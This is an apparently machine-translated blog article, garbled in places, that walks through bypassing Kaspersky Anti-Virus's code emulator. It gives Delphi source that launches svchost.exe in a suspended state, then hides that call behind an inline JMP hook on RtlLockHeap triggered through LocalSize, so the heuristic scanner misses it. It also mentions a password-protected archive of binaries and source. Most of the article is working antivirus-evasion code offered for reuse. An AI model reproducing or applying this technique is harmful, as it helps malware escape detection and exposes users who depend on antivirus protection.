10:50 Vulnerability emulator Kaspersky AntiVirus | |
| At this point in the world created by a growing number of viruses, with the number that can not catch. Therefore, modern technology "network cloud" and heuristic code analyzer designed to protect against completely new threats before the analysts add samples to the antivirus databases. It's no secret that in every system there is always a couple of holes, which sooner or later resurface outside. Sometimes this is due to programmer error, and sometimes - because of technology development virmeykerstva. In this article I'll show you one way to bypass the emulator to the latest versions of Kaspersky Anti-Virus. TheoryWhat in general it represents an emulator in the antivirus and why should I? The answer is very simple - almost all malicious software is subject to various encryption and pakingu kriptora and protectors, while checking the file to disk emulation "spins" testing the executive file to your virtual machine and gradually "gets" to the desired code, a detective who is already happening, or signature, or heuristically. During the development of one of their programs, I ran into a problem that Kaspersky Anti-Virus constantly cursing in my eheshnik how to "HEUR: Trojan.Win32.Generic", although nothing malicious in it I have not seen. By process of elimination it was found that anti-virus swears at process creation function CreateProcess (...), if its parameters exhibited a flag hidden start the process. Get away from it was nowhere, so we had to sort out different versions of the code, especially to myself it was interesting. The result did not take long - a couple of hours was found three ways to counteract the emulator, let's consider, in my opinion, the most interesting of them, which is the vulnerability checks api functions. The emulator checks only call win api, which makes the application under test, but here he examines other api, which is verifiable, as it turned out - no. Whether it was done in order to optimize or simply an oversight of developers - and no one knows. To bring a little clarity shemku: on the left shows the execution of the program in a real environment, and right - performance audits on the code in an emulated environment antivirus. PracticeTo cite an example of the code, which was detected in my program. As mentioned earlier - the code does not do anything wrong, just starts the process in a stopped state. Written in delphi. Procedure ProcessBadCode (); var StartInfo: TStartupInfoA; ProcInfo: TProcessInformation; begin ZeroMemory (@ StartInfo, SizeOf (TStartupInfoA)); StartInfo.cb: = SizeOf (TStartupInfoA); CreateProcessA (nil, 'svchost.exe', nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo); end ; begin ProcessBadCode (); end. All that should be imperceptible to execute code under the noses of the emulator - it will make the hook for any api and transfer execution to the code that should not go unnoticed, and then find another api, which is the first and call it in your code. In the following example, I took the following functions: "RtlLockHeap (...)" from "ntdll.dll" and "LocalSize (...)"from"kernel32.dll". As many have already realized - the second calls the first. After setting the hook on the "RtlLockHeap (...)" call chain is obtained as follows: MyCode (...) - LocalSize (... ) - RtlLockHeap (...) - BadCode (...). Detective antivirus will not be. Var Initialized: Boolean; procedure ProcessBadCode (); var StartInfo: TStartupInfoA; ProcInfo: TProcessInformation; begin if not Initialized then / / our code can be executed once, but huchenaya api - there is no begin Initialized: = True; / / Therefore we make a variable that will control it ZeroMemory (@ StartInfo, SizeOf (TStartupInfoA)); StartInfo.cb: = SizeOf (TStartupInfoA); CreateProcessA (nil, 'svchost.exe', nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo); Sleep (5000) / / wait and finish the running process TerminateProcess (ProcInfo.hProcess, 0); ExitProcess (0) / / finish current end; Sleep (INFINITE); / / all calls huchenoy api we pause end; procedure ProcessStartCode (); procedure WriteJmp (AddressFrom, AddressTo: Integer) / / jmp to write the necessary code var Protect, Stuff: Cardinal; begin VirtualProtect (Ptr (AddressFrom), 5, PAGE_EXECUTE_READWRITE, Protect); PByte (AddressFrom) ^: = $ E9; PInteger (AddressFrom + 1) ^: = AddressTo - AddressFrom - 5; VirtualProtect (Ptr (AddressFrom), 5, Protect, Stuff); end; var NativeFunc: procedure (); begin / / find the address of the first function @ NativeFunc: = GetProcAddress (GetModuleHandle ('ntdll.dll' ), 'RtlLockHeap'); / / We put it hook transferring program execution to BadCode WriteJmp (Integer (@ NativeFunc), Integer (@ ProcessBadCode)); / / Call the second one, which will first ... LocalSize (0); end; begin ProcessStartCode (); end. ConclusionsThe golden rule: "Trust - but verify!" Unfortunately, the existing policy of "trust" signed by the program already has malfunctioned: examples, implemented, and in the virus Stuxnet, and the recent exploitation Adobe. As shown by my little experience - the same issues and subject to heuristic code of one of the most popular antivirus software. Particularly significant that heuristic Kaspersky - one of the two, who noticed a threat to this file (for which he honor and praise), at what the Chinese Detector Jiangmin - clearly a false alarm. I only wish that everything was decided that simple ... All this once again confirms the indisputable truth that no one product does not provide adequate protection without understanding the basics of safety from the operator and its proactive about combating threats. In addition, laid out a set of compiled binaries and source code, which dealt in the article. Password for the archive - elcrabe. I wish to thank nick gjf for help in a prepared paper. | |
|
| |
| Total comments: 0 | |